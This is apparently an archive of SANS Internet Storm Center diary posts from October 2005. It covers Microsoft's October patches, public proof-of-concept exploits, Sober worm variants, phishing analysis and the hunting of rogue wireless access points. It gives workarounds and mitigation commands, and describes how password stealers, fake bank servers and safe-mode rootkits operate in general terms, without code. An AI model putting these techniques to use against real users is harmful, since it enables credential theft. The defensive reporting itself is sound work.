What will happen this weekend? I invited other handlers to add their own opinions/predications to this story. In my opinion, we will not see widespread exploits. This can change quickly, but is also dangerous in its own way. Zotob showed very nicely how an exploit will not get too much attention until it hits a couple of high profile targets. The scenario I am most afraid of is the use of an exploit by a small group to attack high value targets. Remember the "russian key logger" episode (Berbew)? A group exploited a number of well known web sites using the IIS ssl vulnerability, and came back months later to plant an Internet Explorer exploit. We are "ripe" for a repeat of this scenario, in particular the rich selection of new client exploits released.

What should you do this weekend? Stay close to your pager. In particular, don't consider yourself safe as long as CNN isn't reporting about it. Make sure your IDS is setup with MS05-051 signatures, see if you can just log all port 3372 traffic. Use the rest of today to collect some data so you have a baseline if things turn bad. I don't like to recommend to turn systems off. but well, there is nothing more secure then a system diconnected from power.

Please use our forum to share your own opinions and predictions.


Published: 2005-10-14

FrSIRT exploits for MS05-044, MS05-045, and MS05-048

    Within two days, we already have proof-of-concept exploit code for MS05-044, MS05-045, and MS05-048.  The three can be found at:
Microsoft Collaboration Data Objects Buffer Overflow PoC Exploit (MS05-048)
Microsoft Windows Network Connection Manager Local DoS Exploit (MS05-045)
Microsoft Windows FTP Client File Location Tampering Exploit (MS05-044)
    Many thanks to John Otterson and Eric Griswold for noticing this.


Published: 2005-10-13

Increased activity on TCP port 5250

As an update, we have had some readers (thanks Dr. Neal Krawetz, Thomas Schmitzer and Brian Porter) point us to an exploit against the iGateway service.  This exploit was released on October 10 by FrSIRT and appears to be what is causing the traffic.  It allows for a telnet session to port 1711, which also shows a one day increase.   Thanks for all the input and if someone happens to grab packets, we'd still like to see them to confirm.  Also a thanks to Greg Holmes for bringing this to our attention!

If you have captures of any of this traffic, please upload them via the contact page.  Thanks in advance.


Published: 2005-10-13

MS05-044 Folder View for FTP Sites - mailbag item

This is my slightly edited email response to a great point about Microsoft's MS05-044 Security Bulletin, it is a result of email exchanges with a contributor who wishes to remain anonymous;


Well, Microsoft makes "Folder View for FTP Sites" a complex subject and certainly one I may be able to post "Workaround" information on in a Diary post.

AFAICT there are many variables involved in OS and IE "installation" (oem settings, etc) that can affect FTP Folder views. I did read a ton of MS KB's and the two best on the specific issue are referenced below. And I really appreciate your polite persistence in pushing me to read up on this important item. Thank you!.

You're right that MS is misleading in it's Security Bulletin presentation. Because so many factors like OEM and customer installation settings can enable the FTP folder view the Security Bulletin should state a clear workaround on how to look for it in IE advanced tab and clearly state that you can disable it by unchecking/clearing it.

In the bulletin, in the "Mitigating Factors for FTP Client Vulnerability - CAN-2005-2126:" section MS says;
"By default, the "Enable Folder View for FTP Sites" Internet Explorer setting is disabled on all affected operating system versions. An attacker would only be successful if the user manually enables the "Enable Folder View for FTP Sites" Internet Explorer setting on the affected system." This is clearly misleading!

And in the "Workarounds for FTP Client Vulnerability - CAN-2005-2126:" section they only say "Do not download files from un-trusted FTP servers" when they should ADD;

To disable FTP Folders, follow these steps:
1. Click Start, point to Settings, click Control Panel, and then double-click Internet Options.
2. Click the Advanced tab.
3. Under Browsing, to disable FTP Folders, CLEAR/UNCHECK the Use Web Based FTP or Enable Folder View for FTP sites check box.
NOTE: When you CLEAR/UNCHECK the Use Web Based FTP or Enable Folder View for FTP sites check box, you are disabling FTP Folder functionality.

So let me try and work something up on that end and see if I can get it into the diary.

Highest regards,


No option to install Web Folders when you install Internet Explorer 6
Article ID : 298637
Last Review : June 20, 2005
Revision : 5.0

How to Install and Use FTP Folders
Article ID : 217888
Last Review : September 28, 2004
Revision : 3.1  


Published: 2005-10-12

MS05-051 exploit info and rumors

Patch yesterday folks. So far we're aware that an MS05-051 exploit is in the hands of immunitysec Canvas customers - "October 11, 2005: MS05-051 (MS DTC) Trigger for the bug in MS DTC on Windows 2000"

In addition we're seeing reports of non-specific exploit warnings from managed security service providers to their customers. And some rumors.

McAfee Vulnerability Information says that they have protection against exploits of MS Vulnerability MS05-051, "Entercept's Generic Buffer Overflow Protection protects against code execution that may result from exploiting this vulnerability."

ISS says they have protection out for an exploit, it's announcement is here.

NFR says they have protection out for an exploit. their announcement is here.

Here's some pre-vuln announcement facts, see the DShield data on Port 3372 scanning, ymmv.

We'll post anything else that's specific and critical when we get it.


Published: 2005-10-12

24 BEA WebLogic Vulnerabilities and Security Issues

See Secunia's BEA WebLogic 24 Vulnerabilities and Security Issues alert of the issues. Make sure you have plenty of free time, and it's nice to see that this was piled on top of MS Black Tuesday patches.


Published: 2005-10-12

Belated "deja vu" - IR for rootkits that run in safe mode

I was a little busy last August 1st and didn't notice that there was a new glitch in the Matrix, a haxdoor variant that's a real problem for first tier IR folks because "It also ......, drops rootkits that run in safe mode." So a number of weeks later when the second haxdoor variant that "drops rootkits that run in safe mode" was being analyzed by Handlers Tom Liston and Lorna Hutcheson, my jaw was dropping as I read Symantec's August 1st recommendations for "cleaning". To say the least, Symantec's documented recovery instructions are onerous, and first responders should at least read their instructions and compare them to an alternative mentioned below.

Since I then knew of only 2 haxdoor versions which create the SAFEMODE cleaning issue (flattening is still preferred here), and since this cleaning issue doesn't seem to have created any significant AV Vendor issues in the middle of this years malware fe$tival, I dropped a line to some AV acquaintences about IR response problems these two variants create.

To make a long story short, F-Secure took a look at the second "safe mode" variant and said  "Yes, this variant uses the similair registry keys/values. Haxdoor indeed does run in safemode. Symantec's recommendation about recovery console is probably the easiest way to delete haxdoor without any special tools. F-secure Blacklight also can identify and rename haxdoor's files. So I'd recommend users to try that first. It is far easier to use than recovery console."

And if your AV vendor does or does not address this issue, please drop me a line. Thanks!

Also, thanks very much Lorna, Tom and Jarkko!.

F-Secure BlackLight Beta

Symantec Backdoor.Haxdoor.E, "Discovered on: August 01, 2005"

Tom's analysis mentioning the second variant is in the Handler's Diary September 22nd 2005, see Follow the Bouncing Malware IX: eGOLDFINGER


Published: 2005-10-12

Autoruns updated October 6th

Autoruns v8.22 was released on October 6th, "This Autorun update supports arbitrary length Registry and file system paths, adds a find capability to search through configured items, introduces a comparison feature to compare current autostarts with a previously saved version so that you can easily identify new additions, and knows about yet more autostart locations including the Winlogon boot verification Registry value and Shell open hijacks."

The previous registry value length problem was covered by Handler Daniel Wesemann, with many reader contributions, in Nasty Games of Hide and Seek in the Registry


Published: 2005-10-12

VERITAS NetBackup Vulnerability - remote

Veritas has announced a vulnerability, Document ID: 279085, describing a remotely exploitable "format string overflow vulnerability in the Java authentication service, bpjava-msvc, running on NetBackup servers and clients" that is "known to affect the application server for the NetBackup Java GUI."

"The vulnerable daemon listens on port 13722 on both NetBackup servers and clients."

Affected products:

NetBackup 4.5, all versions, all platforms.
NetBackup 5.0, all versions, all platforms.
NetBackup 5.1, all versions, all platforms.
NetBackup 6.0, all versions, all platforms.

Their suggested workaround;
Block external network access on TCP port 13722

Symantec's version of the vulnerability announcement - VERITAS NetBackup: Java User-Interface, format string vulnerability


Published: 2005-10-11

Black Tuesday Summary

Thanks to Lorna for putting together a summary or today's patching fun:

Bulletin Supercedes Severity Impact
MS05-044  N/A Moderate Tampering 
MS05-045  N/A Moderate Denial of Service
MS05-046  N/A Important Remote Code Execution
MS05-047  MS05-039 Important Remote Code Execution and Local Elevation of Privilege
MS05-048  N/A Important Remote Code Execution
MS05-049  MS05-016, MS05-024
Important Remote Code Execution
MS05-050  MS05-030 Critical  Remote Code Execution
MS05-051  MS05-010, MS05-026, MS05-039, MS05-012, MS04-012
Critical Remote Code Execution
MS05-052  MS05-037, MS05-038
Critical Remote Code Execution


Published: 2005-10-11

MS05-049 Windows Shell Vulnerability

MS05-049: Vulnerabilities in Windows Shell Could Allow Remote Code

Impact: Remote Code Execution
Rating: Important
Supercedes: MS05-016 and MS05-024

This bulletin has three Parts to it.

Shell Vulnerability- CAN-2005-2122: A vulnerablity exist in the way that Windows handles the .lnk file extention. A .lnk file is a file that is a shortcut which points to another file and can contain properties that are passed on to the file that it is pointing to. As such, an attacker an attacker taking advantage of this would be able to execute code on the victim's system by getting the victim to open the .lnk file.

Shell Vulnerability - CAN-2005-2118: Same information as above. The main difference appears that instead of opening the .lnk file, the victim only needs to view the properties of the .lnk file.

Web View Script Injection Vulnerability - CAN-2005-2117: This vulnerability deals with Web View format used my Microsoft Explorer to view files and their information. A vulnerability exists in the way that Microsoft handles the validation of HTML characters within certain fields on the files. A attacker taking advantage of this
would be able to take complete control of the victim's system if the vicitim views the malicious file with the Web View format turned on in Explorer.



Published: 2005-10-11

MS05-046 Client Service for NetWare Vulnerability

MS05-046 affects "Customers who use the Client or Gateway Service for NetWare" using Microsoft Windows 2000 Service Pack 4, Windows XP Service Pack 1, XP Service Pack 2, Windows Server 2003 and Windows Server 2003 Service Pack 1.

The update "resolves a newly-discovered, privately-reported vulnerability", MS rates it Important, and MS says update at your "earliest opportunity".

I rate it "Critical", test and deploy this update ASAP. One reason is that Microsoft notes "CSNW is commonly associated with the Internetwork Packet Exchange (IPX) and Sequenced Packet Exchange (SPX) protocols. However, CSNW could be exploited by using any installed protocol".

In the MS list of workarounds, one reasonable workaround is "Block TCP ports 139 and 445 at the firewall" and "use a personal firewall". An unreasonable workaround is that MS says you can remove CSNW.

CVE CAN-2005-1985 is "(under review)" and "Reserved" so far.

NOT AFFECTED - Microsoft Windows XP Professional x64 Edition, Windows Server 2003 for Itanium-based Systems, Windows Server 2003 with SP1 for Itanium-based Systems, Windows Server 2003 x64 Edition, Windows 98, Windows 98 Second Edition (SE), and Windows Millennium Edition (ME).



Published: 2005-10-11

MS05-044 Windows FTP Client File Transfer Location Tampering

MS05-044 Vulnerability in the Windows FTP Client Could Allow File Transfer Location Tampering

KB: 90595
CVE: CAN-2005-2126

This bulletin and related patch resolves a newly discovered public vulnerability.  The flaw exists in the Windows FTP Client on Windows 2000SP4 (with IE 6 SP1), XP SP1 and Windows Server 2003 computers.  An attacker can exploit the flaw to tamper with the file transfer location on the client during an FTP file transfer session.  When a client has manually chosen to transfer a file via FTP on affected systems, the attacker can redirect the storage location to a location such as the Startup Folder.  In general, if you do not download files from un-trusted FTP (or any other servers) then you really won't have a problem.  Unfortunately, most end users are too trusting of links on the web and email and can be exploited in a few situation.

Per Microsoft, the vulnerability is mitigated in 3 ways.

1) "The attacker would have to successful persuade end users to visit an FTP server hosting files with specially-crafted file names" and would not have a way to forcing the files to be transferred.  This would require our end-users to interact with dialog boxes and click on links without concern.
2) If the file of the same name already exists in this alternate location, then an "Overwrite File" warning message will be presented.  If end users click through the dialog box, then it will go ahead and overwrite the file.
3)  If the Internet Explorer setting "Enable Folder View for FTP Sites" is changed from the default disabled state, then the attack will be successful.



Published: 2005-10-11

MS05-051 Vulnerabilities in MSDTC and COM+

MS05-051 is actually 3 unrelated vulnerabilities wrapped into one advisory. To aid in our discussion, I split it into '05-051-A' through '05-051-C':

MS05-051-A: MSDTC Vulnerability
KB: 902400
CVE: CAN-2005-2119

MSDTC stands for "Microsoft Distributed Transaction Coordinator". This facilities allows programmers to combine updates send to several programs or systems into a "Transaction". This ensures consistency across several applications.

This vulnerability is particularly serious for Windows 2000. In the case of Windows 2000, a remote user may trigger the vulnerability without having to log in. For Windows 2k3 and XP, a user would have to log in first.

Either way, an exploit for this vulnerability would provide full system access. One of the other non-system vulnerabilities could leverage the MSDTC problem to gain full system access.

As a quick workaround, you should disable the network access to DTC. See
this MSDN Article for details. Even if you patch, you should still disable remote access to DTC if you don't need it.

Quick notes to disabled DTC:

sc stop MSDTC & sc config MSDTC start= disabled

Eeye discovered the vulnerability and provided a cookbook to write an exploit as part of its advisory. Shouldn't take too long to see this exploited.

Additional information about this vulnerability has been published by iDefense, available at http://www.idefense.com/application/poi/display?id=319


MS05-051-B: COM+ Vulnerability
KB: 902400
CVE: CAN-2005-1878

COM+ is used to allocate resources to applications. By keeping for example connection pools and allocating connections as needed to processed, programs will be able to run faster as they do not have to initiate a new connection each time.

On Win2k and XP-SP1, an attacker can use this vulnerability to remotely obtain administrator privileges without having to authenticate. On XP-SP2 and Win2k3, this vulnerability can only be used to escalate privileges of a local authenticated user.

Standard firewalling procedures (UDP 135,137,138,445 and TCP 135,139,445,593) can help mitigate the vulnerability. However, if you have COM Internet services enabled, or RPC over HTTP, you will also have to firewall port 80 and 443.

Patching this vulnerability is critical for Win2k users. XP-SP1 users should patch and update to SP2 if possible. You may also want to consider disabling DCOM in addition to patching. See the MSFT bulletin for details.


MS05-051-C: TIP Vulnerability and Distributed TIP Vulnerability
KB: 90240
CVE: CAN-2005-1979, CAN-2005-1980

The Transaction Internet Protocol ('TIP') is used by MSDTC (see MS05-051-A) to interface with other transaction managers. The particular vulnerability discussed here is a denial of service vulnerability which will cause TIP to seize responding if a particular crafted message is received.

Additional information about this vulnerability has been published by iDefense, available at http://www.idefense.com/application/poi/display?id=320




Published: 2005-10-11

MS05-045: Network connection Manager DoS

KB: 905414
CVE: CAN-2005-2307

The Network Connection Manager is used to manage different network connections (e.g. LAN, Dialup ...). A special crafted packet send to a connection can cause the Netowrk Connection Manager to die. However, it will restart once a new request is received.

Not much of a vulnerability. Requires an already authenticated (=connected) user and impact appears to be minimal. The latest versions of Windows are not vulnerable (XP-SP2, Win2k3 SP1). However, older and still popular versions are (like XP-SP1, Win2k3 pre-SP1, Win2k).

Firewall best practices can be used to mitigate the issue.



Published: 2005-10-11

MS05-047 Vulnerability in PnP Could Allow Remote Code Execution

KB: 905749
CVE: CAN-2005-2120

This patch addresses a remote code of execution and local elevation of privilege vulnerability which exists in Plug and Play.  This vulnerability is similar to the one addressed by MS05-039, however,  it requires the attacker to have valid logon credentials to exploit the flaw.  For those that have not patched for MS05-039 under Windows 2000, this issue could be exploited remotely by anonymous users.  Windows XP SP2 computers must be able to log on locally in addition to having valid logon credentials for the administrator.  This patch replaces MS05-039 which was released in August of the Zotob worm fame.

The standard practice of blocking ports 139 and 445 TCP will help slow exploitation of this. Just remember that the road warriors who are connected to less firewalled locations can potentially bring any such activity inside your organization.

Microsoft rates this vulnerability as an Important Severity as it does require valid logon credentials to attack a host.  Knowing that many corporations and academic organizations use a common password for local administrator or other accounts on desktop computers, it is not unconceivable to me that this could be more critical then first look.  Any passwords that were compromised with MS05-039 (or any other patches in the past year) could be used to satisfy the need of local credentials in 2000 and XP systems prior to exploitation.  If all compromises of hosts in the past year or so resulted in all related passwords across the domain being changed, then this will be a mostly non-event.  If old passwords are still in use, then botnets or other malware will widely exploit this one in due time.



Published: 2005-10-11

MS05-050 Vulnerability in DirectShow

KB: 904706
CVE: CAN-2005-2128

DirectShow is part of DirectX. This component is used to display audio and video stream. DirectX is able to do so very fast and efficiently by taking advantage of hardware specific acceleration.

In order to trigger this vulnerability, a user has to open a malicious .avi video file. If opened, the file may execute arbitrary code. This vulnerability is not able to escalate privileges by itself. So wherever damage will be done will be limited to files the user running DirectShow has access to.

Malicious .avi files would likely be delivered as an instant message link, a URL on a web site or they may be attached to an e-mail message.

Standard "safe computing" practices will help mitigate this vulnerability. For example, do not log in as "Administrator" for day to day work and avoid accessing untrusted web sites. However, these steps are not perfect and patching is highly recommended.

In some cases, in particular on servers, you may be able to do without DirectX. Let us know if you have a recipe on how to disable DirectX.



Published: 2005-10-11

MS05-048 CDO Object Remote Code Execution


KB: Win2K SP4 - KB901017, WinXP SP1/SP2 - KB901017, Win2K3 - KB901017
CVE: CAN-2005-1987

Colloborative Data Objects (CDO) allow Windows systems to send email through SMTP or a Microsoft Exchange server.  An unchecked buffer in the CDO functions for Windows 2000 and later systems (CDOSYS) and in Microsoft Exchange servers (CDOEX) allows an attacker to compromise the target host.  In order to trigger this vulnerability, an attacker has to deliver a specially-crafted mail message via SMTP which is processed by the event sink handling subsystem, designed for granular processing of CDO messages.

The mitigating circumstance for this vulnerability is that IIS 5.0 and Exchange 2000 SMTP service do not use event sinks by default, which mitigates the vulnerability.  IIS 6.0 SMTP service does use event sinks and is therefore vulnerable, but IIS 6 does not install the SMTP service by default.  There is some confusion in the Microsoft bulletin about Exchange 2003 as it is listed as both "not vulnerable" and in the "affected software" sections of the bulletin.

The challenge with determining if your IIS SMTP service or Exchange 2000 system is vulnerabile depends on whether or not you are using event sinks on your system.  Third-party software vendors such as SPAM gateways or anti-virus systems may install event sinks to process email messages, making these products vulnerable to this flaw.

The workaround is to disable event sinks, which may not be an option for your third-party AV or SPAM filtering software.  Customers should apply the patches to resolve this flaw at the earliest opportunity.



Published: 2005-10-11

MS05-052 Cumulative Security Update for Internet Explorer (896688)

Microsoft has released Microsoft Security Bulletin MS05-052 and reports the "Impact of Vulnerability: Remote Code Execution", "Maximum Severity Rating: Critical" and their "Recommendation: Customers should apply the update immediately.".

Once again, watch out on this one because the only thing a part of this cumulative update does is set "the kill bit for the affected Class Identifiers (CLSID) in these COM objects.". And it's a growing list of kill bits MS is setting.
In your environment, if you cannot accept setting the kill bits involved in this "Cumulative" update, then you are effectively prevented from receiving other portions of the update, including "improvements to the Internet Explorer Pop-up Blocker" and "improvements to the Internet Explorer Add-on Manager." MS also mentions that the "Cumulative" Security Update "includes a kill bit for the ADODB.Stream object. This kill bit was released previously, but not as part of a security  update. For more information about the ADODB.Stream object, see Microsoft Knowledge Base Article 870669. The Class Identifier (CLSID) for this object is 00000566-0000-0010-8000-00AA006D2EA4."

CVE CAN-2005-2127

Previous commentary on kill bits - Open letter from the handlers

Affected Software:
• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition
• Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)

A portion of this "Cumulative" update replaces MS05-037 and MS05-038.


Published: 2005-10-11

SSL 2.0 Rollback in OpenSSL

New versions of OpenSSL have been released today (0.9.7h and 0.9.8a) to address a potential cryptographic weakness.  In servers that have enabled SSL_OP_ALL for compatibility reasons, the session is vulnerable to a potential rollback to SSL 2.0, even in the presence of SSL 3.0 and TLS 1.0, due to the implied SSL_OP_MSIE_SSLV2_RSA_PADDING setting.  Note that SSL 2.0 suffers from several cryptographic vulnerabilities, including allowing an attacker to manipulate the encrypted contents of packets without the possibility of being detected.

This can be solved by either disabling SSL 2.0 entirely on either endpoint, or by upgrading the server software to one of the new OpenSSL versions.

For more information, see:  http://www.openssl.org/news/secadv_20051011.txt


Published: 2005-10-11

CA iGateway debug mode HTTP GET request bo vulnerability/exploit

Computer Associates has an announcement concerning an "iGateway debug mode HTTP GET request buffer overflow vulnerability" that says "Remote attackers can execute arbitrary code." Exploit code is publicly available. Their is no patch available at this moment, the recommended workaround is "do not run iGateway in debug mode." Computer Associates announcement references CA iGateway 3.0, and CA iGateway 4.0.


Published: 2005-10-10

Large botnet in the Netherlands taken down

A large botnet in the Netherlands, with over 100k infected, was taken down 3 days ago by a cooperative effort of several CERT's.  The National High Tech Crime Centre, (NHTCC), GOVCERT.NL, and the Computer Emergency Response Team of the Dutch government worked together to take down this w32.toxbot - driven network.

For more information.....



Published: 2005-10-10

User questions new WindowsUpdate Fix

One of our readers submitted a question, which I'd like to pass on to all; Back in September Microsoft posted an issue with it's update, which we covered in our diary


For which Microsoft then submitted


So, today being a somewhat slow day, we were wondering if there are any readers who had problems with WindowsUpdate, and subsequently applied the listed patch?  What were the results?


Published: 2005-10-10

Happy turkey day

Happy Canadian Thanksgiving!




Published: 2005-10-09

What I'm reading today

Another thing I like to do when I have a quiet shift is to mention the security book I'm reading and see if any of you have other suggestions.  Just this afternoon, I finally started reading one of the books I've had sitting on my desk for a couple of months, but just hadn't gotten to.  This one is File System Forensics (ISBN 0-32-126817-2) by Brian Carrier (of TASK/Sleuthkit and Autopsy fame).  I had the privilege of meeting Brian at a SANS conference when he was still a grad student, just after he released the first version of TCTUTILS, though I'm sure he won't remember me.  So far, it looks like it will be an excellent addition to the other forensic books on my book shelf.  I'll let you know for sure during my next shift.

Jim Clausing, jclausing /at/ isc.sans.org, also see http://handlers.sans.org/jclausing/


Published: 2005-10-09

DHCP OS Fingerprinting

Since it was another pretty quiet day, I was looking back through some old notes to see if I could come up with some diary material.  I read this article in SysAdmin magazine in February.  It got me thinking about how we track/manage the machines on our networks.  Especially the user machines.  The project at Kansas looks pretty interesting, but I was wondering if any of you, our loyal readers, had any experience with this or other similar tools and would be willing to share your experiences.  Send your experiences to me and I'll summarize the responses in my next diary (right now, I'm signed up for 9 Nov) and on my handler page.

Jim Clausing, jclausing /at/ isc.sans.org


Published: 2005-10-09

More on hunting rogue access points

If you haven't read Kevin Liston's story from Friday on his adventure's hunting down rogue access points, please go read it.  I have to mention one other resource, if it comes to your area, check out the SANS Stay Sharp Program: Defeating Rogue Access Points class.  I had the opportunity to teach it in June and it does an excellent job of covering the fundamentals of how to track down these rogues in your environment.

Jim Clausing, jclausing/at/isc.sans.org  and http://handlers.sans.org/jclausing/


Published: 2005-10-08

Slow day

At the risk of jinxing it, this has been a slow day.  There were some excellent diary entries yesterday by Kevin Liston.  So I'll just encourage everyone to read those.


Published: 2005-10-07

Fingerprinting Phishers

Over the past couple of months, the number of phishing attacks targeting my client's customers has increased tremendously.  They began to ask me: "why us?"

I haven't answered that question yet, there are still a number of theories, and very little evidence to sort.  But I have made some progress in addressing the "who is attacking us?" question.

First, there is the bait-message.  This is the email that is sent out with the hopes of finding appropriate targets.  Each of these can be investigated as a spam campaign.  They have their spam relays, they have their target list, they have their subset of subject messages, and they may or may not have a permutation of body.

I think it's possible that the people managing the spam campaign are separate from those managing the actual phishing attack.  It's possible that separate phishing groups could employ a single spamming outfit.  That's just a theory at the moment.

Secondly, there is the hook-site.  This is where the link in the bait-message initially takes the victim.  The hook-site may also be the collection-site, but it could forward the victim on to a separate collection server.  This technique is especially common in cases where a phisher has a network of collection sites.

Use of network of sites, is an identifying quality of a phisher.  I argue that given a set of phishing attacks, one can partition them to identify certain habits or modus operandi of the criminal actor.  This actor may be an individual or a group.

There are two main ways that I use to build these partitions or clusters.  You can compare how the hook-site or collection-site is built.  By collecting copies of the phishing sites during your investigation and keeping them on hand, an investigator can go back and identify "repeat offenders."  By comparing the fake website, to the target-firm's original site, you can examine any changes that the criminal applied.  You could also approximately date when the site was copied—if you have a suitable change-control process on your web content.

Clusters and habits can also be detected in the URL used for the hook-site.  How the criminal compromises, purchases, or otherwise acquires the hosting space can be evident in this URL.  Are they creating suspiciously long domain names (implying they control the DNS,) or are they using doted directories in an attempt to hide the space from visual detection?  Are the sites hosted off of cgi-bin space, or in directories of a BBS application?  All of these qualities can be used to cluster a number of attacks into a smaller set of attackers.

Clustering along where a hook- or collection- site is hosted can sometimes illuminate a pattern; I did not find this to be the case in this population of URLs.  I did find some interesting correspondences in the registrar used for some of the domains.  This appeared to be indicative of an issue in the registrar's validation policies.

In an attempt to automate the detection and classification, I wrote some routines that calculate the "lexical distances" between the URLs used in the attacks.  Then we built clusters based on arbitrary thresholds on these distances to see if the system was any better at classifying similar attacks than they humans.  Needless to say, the trained human analyst will outperform my pathetic Perl script any day of the week, but they did find it helpful.  Which is what it's all about.

Sadly, identifying clusters and forming a behavioral fingerprint of a criminal is a long way from identifying said criminal.

kliston -AT- isc sans org


Published: 2005-10-07

Adventures in Hunting Rogue Wireless Access Points

This week I had to opportunity to hunt down some rogue WAPs at a client's campus.  It was a very target-rich environment.  Out of the 62 talker's that I spotted on the hunt, 39 of them were not the main, accepted infrastructure.  Out of these 39, we were looking for only one.  Not quite a needle-in-a-haystack problem, but more like something-under-a-desk-in-a-sea-of-cubicles problem.

The Playing Field
The search area consisted of an extremely large low-rise facility with cubicles reminiscent of poultry factory farming.

The Players
Myself, with my trusty combat-laptop running Debian and Kismet 2005.04.R1 with an Orinoco Gold PCMCIA card, and an external directional antenna.


The engineer who designed the wireless infrastructure with his Windows XP laptop, Cisco Aironet card, and AiroPeek from WildPackets.

Well, it was more of a team effort.

The Strategy
Based on the results that we were seeing from the Engineer's WLSE (http://www.cisco.com/en/US/products/sw/cscowork/ps3915/) interface we knew that two of his WAPs could see the target, and we knew approximately where these WAPs were installed.

He went with the back-pack, cary-the-laptop around method, while I appropriated a cart to wheel around.

We went down to the area and wandering ensued.  Eventually, kismet detected the beacon packets.  The best way to use Kismet in hunting a single WAP is to bring up the details (the 'i' key in this version,) and keep an eye on the power rating.  The 14dBi gain antenna wasn't as much use in the environment as I had hoped it would.  It did help in determining if we were on the right floor, and which WAP is was most likely close to.  It got us into the general area.  Eventually you get too close to the transmitter for the antenna to be helpful.

Attenuation is Your Friend
As you get closer to the transmitter, the signal is hot enough that you can't see the subtle changes in intensity to help guide you in the correct direction efficiently.  You need to "knock the signal down" a bit so that it fits better on your meter, so that you can read the changes.

My first step was to pull out the directional antenna.  In what turned out to be good luck, the only cart that was available for me was a high walled metal cart used to transport hanging-files.  This held my laptop and it's PCMCIA card in the bottom of a metal box.  So it was shielded from the signal rather well.

Once I was in the right area, I would effectively worm my way around the cubes until I spotted the blinky box that we were after.

My initial plan to solve the rogue access point problem was to buy some prizes and have a few "Fox and Hound" contests on the weekend where some of the appropriately-minded employees could "compete."  I still like that plan, but any time that you have people looking through cubes, you have to operate in teams so they can both keep-an-eye-on and vouch-for each other.

For more information on general transmitter hunting, I recommend Moell and Curlee's Transmitter Hunting: Radio Direction Finding Simplified.  Although their focus is on a different frequency range, the general concepts apply.

kliston -AT- isc sans org


Published: 2005-10-07

Request for packets 50032

Take a gander at this graph of activity on port 50032.  If you have a sensor that has seen any conversations on this port, we'd like to see some of the packets.

If you have only logs, please submit them directly to dshield.org for processing.  It is the packets that we are interested in.


kliston -AT- isc sans org


Published: 2005-10-07

Bluetooth Followup Links

Last Saturday I posted a bit more about my andventures in Bluetooth scaning.  I left out a link that I had intended, and a few more interesting links were sent in by the readers.

I failed to provide a link to btscanner by Pentest in the UK  I did not use it in my tests, but I've heard good things about it.

Other intersting links that were sent to me:


and something interesting form slashdot:

kliston -AT- isc sans org


Published: 2005-10-07

Open-source Newsbits

I don't want to compete with slashdot, but there were two announcement made yesterday that impact the Open-source Security tool market.

Tenable announced yesterday that Nessus 3 will be closed-source: http://news.com.com/Nessus+security+tool+closes+its+source/2100-7344_3-5890093.html?tag=nefd.hed

Checkpoint announced the purchase of Sourcefire, but promises to keep Snort open-source: http://www.checkpoint.com/sourcefire/index.html

kliston -AT- isc sans org


Published: 2005-10-07

Microsoft October Security Bulletin Advanced Notification

Microsoft released their advanced notification (advanced as in time, not skill requirement) yesterday promising a release of nine security bulletins next Tuesday.  The highest rating is projected to be "critical," and there will be reboots required.

I can't wait.

kliston -AT- isc sans org


Published: 2005-10-06

Battle of the ISP's

If you are Cogent or Level 3 customer, you may be experiencing some problems with your surfing experience today.  It seems that the two have decided to play the "I am better than you game" at the expense of their customers.
According to the information Hardware Geeks  - this is preventing web pages on one site from being accessed by the others ones customers. 




It looks like these "boys" need a timeout.  Go to opposite corners and take a deep breath. (Isn't that what we tell the children when they start fighting.)

It will definitely be interesting to watch this one play out.


Published: 2005-10-06

Two New Sober Viruses on the Loose Today

It never fails somehow it seems that whenever I am to be the Handler On Duty we have another little Smurf pop out of the closet.  Today's little Smurf is Sober.R or Sober.Q or Worm_Sober.AC or ...., well you get the drift.  (What's in a name anyway. ) However, I am pleased to say that the official CME has been released for this little fella'. Nothing to report there yet - says Not Currently Available.  You'll have to keep checking back to see what the update brings.


We do however believe that we are working with at least two different versions.

FSecure has an interesting write up on this and is calling the second one a Dropper.  Take a look at the info in F-Secures writeup.


Our malware team is looking at the code as we speak.  It appears that this one is picky about who is blessed to receive a copy.  It appears to be a self mailer.  Our malware team is hard at work attempting to identify evaluate this thing and will update us as soon as possible.

It looks like the attachment name may have changed as well.  The one that I just received had the attachment name


and appears to be according to the subject my "Registration Confirmation".  

The program is packed with some pretty nasty stuff.  It looks like it may scan the hard drive to see what additional mischief it can create.  It appears to create a file services.exe and sets itself up to run in the registry.

We will keep you updated on any additional info that we get on this.


Published: 2005-10-06

Sober Virus (CME-151)

There are reports on a new variant of Sober going around the net. Different antivirus vendors name it differently. But thanks to CME effort, it is identified as CME-151.

This variant uses different email messages randomly in either German or English. We have received several reports from our readers. One reader submitted to us with the email message as below:

Danke für Ihre Mail ....
Sie haben aber Ihre Mail wahrscheinlich falsch adressiert,,, nämlich an mich. Ich kenne sie aber nicht!
Oder Ihr Provider hat die Mail falsch weiter geleitet!?
Um mich zu entlasten, schicke ich Ihnen das (...) Foto wieder zurück.

This virus arrives with one of the following attachment names:
* KlassenFoto.zip
* pword_change.zip

Inside the ZIP archive is a file named PW_Klass.Pic.packed-bitmap.exe.

You can check out more details from various antivirus vendors website:


Published: 2005-10-05

Pwstealers - evolution

While reading Mike's great story from yesterday's diary I thought about post this little story about my observations of Password Stealers, also known as PWstealers.

I have been watching this kind of malware for some time. I dont have exactly numbers but I am pretty sure that Brazil is one of the most targeted countries for this kind of scam...

I currently can distinguish four kinds of the pwstealers:

    - The keyloggers/screenloggers
    - The fake bank windows
    - Fake Bank webservers
    - The downloaders

The keyloggers/screenloggers will detect the bank urls and then try to get most of the information available and then send it to and email. I already found a compromised machine that was hosting hundreds of directories, and each one was from a machine and inside it, hundreds of small images from the user clicking, to find his/her passwords...

The fake bank windows is a funny one...whenever it detects the bank urls, it would call IE with a fake website of the bank that you typed.:) The funny was that not rare, the fake websites were outdated and with some strange graphics...The user was suppose to fill all fields and then the windows would close with an (also fake) error message...:)

The fake bank webservers are quite interesting. This malware would install a webserver on the machine, change the hosts file to redirect a specific bank domain to his localhost, which would be running the Bank homepage, right?:)

